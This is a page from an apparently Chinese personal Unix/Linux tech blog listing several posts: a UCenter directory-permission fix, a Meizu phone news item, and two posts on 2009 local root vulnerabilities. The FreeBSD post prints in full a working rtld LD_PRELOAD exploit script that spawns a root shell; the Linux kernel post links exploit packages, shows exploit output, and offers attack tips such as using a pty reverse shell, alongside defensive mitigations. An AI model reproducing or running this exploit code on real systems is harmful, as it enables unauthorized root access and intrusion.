BigSea'Blog

身体下地狱,眼睛上天堂,心灵回故乡。走在路上,那是痛苦的幸福;走过之后,是幸福的痛苦。

Unix/Linux技术

关于UCenter登录后空白的问题

No Comments | Unix/Linux技术 | by bigsea | 59 Views. | 2010, August 26, 5:44 PM
在对目录权限进行设置时,还需把以下目录的权限改成可写:   

.uc_server/data   

.uc_server/data/cache   

.uc_server/data/view   

.uc_server/data/avatar   

.uc_server/data/logs   

.uc_server/data/backup   

.uc_server/data/tmp   

这样再进行程序的安装,Ucenter就可以顺利登录了。   

阅读全文

FreeBSD爆严重安全漏洞,安全专家称疑是圣诞前的礼物

No Comments | Unix/Linux技术 | by bigsea | 1189 Views. | 2009, December 2, 2:35 PM

在圣诞节即将到来的日子,以安全著称的FreeBSD系统被著名黑客Kingcope爆了一个零日(0day)漏洞。据Kingcope所说,他长 期致力于挖掘FreeBSD系统的本地提权漏洞,终于有幸在近期发现了这个非常低级的本地提权漏洞;这个漏洞存在于FreeBSD的Run-Time Link-Editor(rtld)程序中,普通用户可以通过该漏洞非常轻易的获得root权限。该漏洞影响非常广泛,包括FreeBSD 7.1至8.0的32及64位系统。

在展示该漏洞威力之前,我们科普一下著名黑客kingcope。从2007年6月至今,他一共 公开了12个安全漏洞(没公开的不知道有多少),其中 FreeBSD和Sun Solaris各两个,微软四个,Oracle、mysql、NcFTPD和nginx各一个,同时他还编写了多个漏洞的攻击代码,例如 Sun Solaris telnetd及近期的IIS FTPd、Debian OpenSSH等。

接下来我们在最新的FreeBSD 8.0中重现一下该漏洞的攻击过程,请注意图中的红色部分;我们只要执行名为fbsd8localroot.sh的脚本,就可以轻易的获得root权限。

08365101071684681.png - 大小: 20.36 K - 尺寸:  x  - 点击打开新窗口浏览全图


相关脚本如下:

#!/bin/sh
echo “FreeBSD local r00t zeroday by Kingcope on November 2009″
cat > env.c << _EOF
#include <stdio.h>
main() {
       extern char **environ;
       environ = (char**)malloc(8096);
       environ[0] = (char*)malloc(1024);
       environ[1] = (char*)malloc(1024);
       strcpy(environ[1], “LD_PRELOAD=/tmp/w00t.so.1.0″);
       execl(”/sbin/ping”, “ping”, 0);
}
_EOF
gcc env.c -o env > /dev/null 2>&1
#download from baoz.net
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
       extern char **environ;
       environ=NULL;
       system(”echo ALEX-ALEX;/bin/sh”);
}
_EOF
gcc -o program.o -c program.c -fPIC ; gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles ; cp w00t.so.1.0 /tmp/w00t.so.1.0 ;./env

FreeBSD尚未就该0day漏洞发布安全公告及官方补丁,敬请关注素包子的博客http://baoz.net/freebsd8-localroot-0day/以获取该漏洞的最新情况。

阅读全文

黑客再爆Linux内核高危漏洞,一个命令可以攻击所有Linux系统

No Comments | Unix/Linux技术 | by bigsea | 2188 Views. | 2009, August 16, 11:31 PM

 在微软本月月经日(8.11)的同一天,国外黑客taviso和julien公开了可以攻击所有新旧Linux系统的一个漏洞,包括但不限于RedHat,CentOS,Suse,Debian,Ubuntu,Slackware,Mandriva,Gentoo及其衍生系统。黑客只需要执行一个命令,就可以通过此漏洞获得root权限,即使开启了SELinux也于事无补。攻击这个漏洞到底有多简单,下面我们看图说话,有图有真相。

 

CHANGELOGS:

2009/08/16 chenjun@xfocus提供了debian/ubuntu系统的修复方式。

2009/08/16 根据网友要求添加漏洞详情和exploit下载地址。

2009/08/16 改进修复方式,避免RHEL下的无效修复。感谢小阮MM反馈并提供服务器协助定位解决。

2009/08/16 添加攻击经验记录。感谢cnbird分享经验。

linuxlocalroot

如上图所示,利用此漏洞极其简单,并且影响所有的Linux内核,baoz强烈建议系统管理员或安全人员参考下列临时修复方案,以防止Linux系统被攻击 。

1、使用Grsecurity或者Pax内核安全补丁,并开启KERNEXEC防护功能。

2、升级到2.6.31-rc6或2.4.37.5以上的内核版本。

3、如果您使用的是RedHa tEnterprise Linux 4/5的系统或Centos4/5的系统,您可以通过下面的操作简单的操作防止被攻击。

在/etc/modprobe.conf文件中加入下列内容:

install pppox /bin/true
install bluetooth /bin/true
install appletalk /bin/true
install ipx /bin/true
install sctp /bin/true

执行/sbin/lsmod | grep -e ppp -e blue -e app -e ipx -e sct,如果没有输出,你不需要重启,如果有输出,你需要重启系统,才可以对此攻击免疫。

下图是免疫前后的效果对比图:

2.6local

mianyi

4、如果您使用的是Debian或Ubuntu系统,您可以通过下面的操作防止被攻击(感谢chenjun提供)

cat > /etc/modprobe.d/mitigate-2692.conf << EOM
install ppp_generic /bin/true
install pppoe /bin/true
install pppox /bin/true
install slhc /bin/true
install bluetooth /bin/true
install ipv6 /bin/true
install irda /bin/true
install ax25 /bin/true
install x25 /bin/true
install ipx /bin/true
install appletalk /bin/true
EOM
/etc/init.d/bluez-utils stop

很明显,第三、四个方案最简单也相对有效,对业务影响也最小,如果您对编译和安装Linux内核不熟悉,千万不要使用前两个方案,否则您的系统可能永远无法启动。

如果你希望了解漏洞详情,请访问下列URL:

http://archives.neohapsis.com/archives/fulldisclosure/2009-08/0174.html

http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html

https://bugzilla.redhat.com/show_bug.cgi?id=516949

如果你希望亲手验证此漏洞,你可以下载下列两个代码包测试(有可能导致系统不稳定,当机等现象,后果自负):

http://www.securityfocus.com/data/vulnerabilities/exploits/wunderbar_emporium-3.tgz

http://www.securityfocus.com/data/vulnerabilities/exploits/36038-4.tgz

攻击经验记录:

1、如果selinux没开,会报缺少Pulseaudio文件,实际上根本不需要他,只是selinux没开导致的,用另外一个exp攻击同样不成功。从这里可以总结出来,如果你没开selinux,在现有的exploit下,不需要做任何操作,也不会受到攻击。当然,这个是我个人经验总结,并且只在RHEL5上验证过,请各位自己评估风险。顺带说一下,SElinux这东西,默认是开启的,如果你没关闭过他。根据我的猜测,可能是exp在bypass selinux那段代码里出了点问题。所以说改/etc/selinux/config文件,禁用selinux,也可以在一定程度上防范公开的exp。

[xiaoruan@localhost wunderbar_emporium]$ ./wunderbar_emporium.sh
 [+] Personality set to: PER_SVR4
Pulseaudio does not exist!

[xiaoruan@localhost run]$ sh run.sh
padlina z lublina!
mprotect: Cannot allocate memory

2、回连的shell溢出虽然可以成功,但uid不是0,解决办法是用一个带pty的shell。这个经验由cnbird提供。

Linux在微软的月经日爆如此严重的漏洞,挺值得纪念的。如果您希望了解本漏洞更多的内幕、八卦和细节,

本文转自包子博客http://baoz.net/linux-sockops-wrap-proto-ops-local-root-exploit/

ps:好久没看到linux下提权的漏洞了,在cb上看到有人直接执行w*命令,笑死了,在cb上的新闻也直接有点标题党的意思,一个溢出程序耗费了一个黑客的多少心血,一个命令就搞定太搞笑了;重点是下面的东西,呵呵

http://www.securityfocus.com/data/vulnerabilities/exploits/wunderbar_emporium-3.tgz
http://www.securityfocus.com/data/vulnerabilities/exploits/36038-4.tgz
两个攻击程序包。

如果无法下载可以下载附件。

 

阅读全文

M8或在明年用上Android 带Wifi与WAPI版已送检

No Comments | Unix/Linux技术 | by bigsea | 1486 Views. | 2009, August 16, 10:20 PM

魅族公司老总 J.Wong 在魅族论坛透露,即将发布的新UI依然基于WINCE系统,而M8的Android的系统将在明年底正式面世,在此之前会放出测试版。另外,同时带有WAPI和WAFI的正式版M8已送检工信部,未来将没有测试版与正式版之分。以下是J.Wong原话:

原帖由 J.Wong 于 2009-8-16 17:33 发表 
带WAPI兼容WI FI的M8我们已送往工信部检测,取得新的入网许可证后就不存在正式版和测试版之分。
另外目前魅族的实力还很小,不可能在每个媒体上投入广告,等时机到了受众群体符合的媒体我们肯定会相应投入一些广告的 ...

原帖由 J.Wong 于 2009-8-16 20:01 发表 
信号问题9月肯定能解决的。

原帖由 J.Wong 于 2009-8-16 19:50 发表 
新UI首先是基于win ce的,基于Android的也会做,并会不定期放出给魅友测试,但估计要到明年年底才会比较完善。

原帖由 J.Wong 于 2009-8-16 19:54 发表 
并不是说要明年年底魅友才能用上

ps:I like Android!!!

J.Wong中国的乔布斯,魅族,看好你~~M9再加上GPS明年换手机就是你了~~

 

阅读全文

Total: 37Page 1 of 81234567Next ›Last »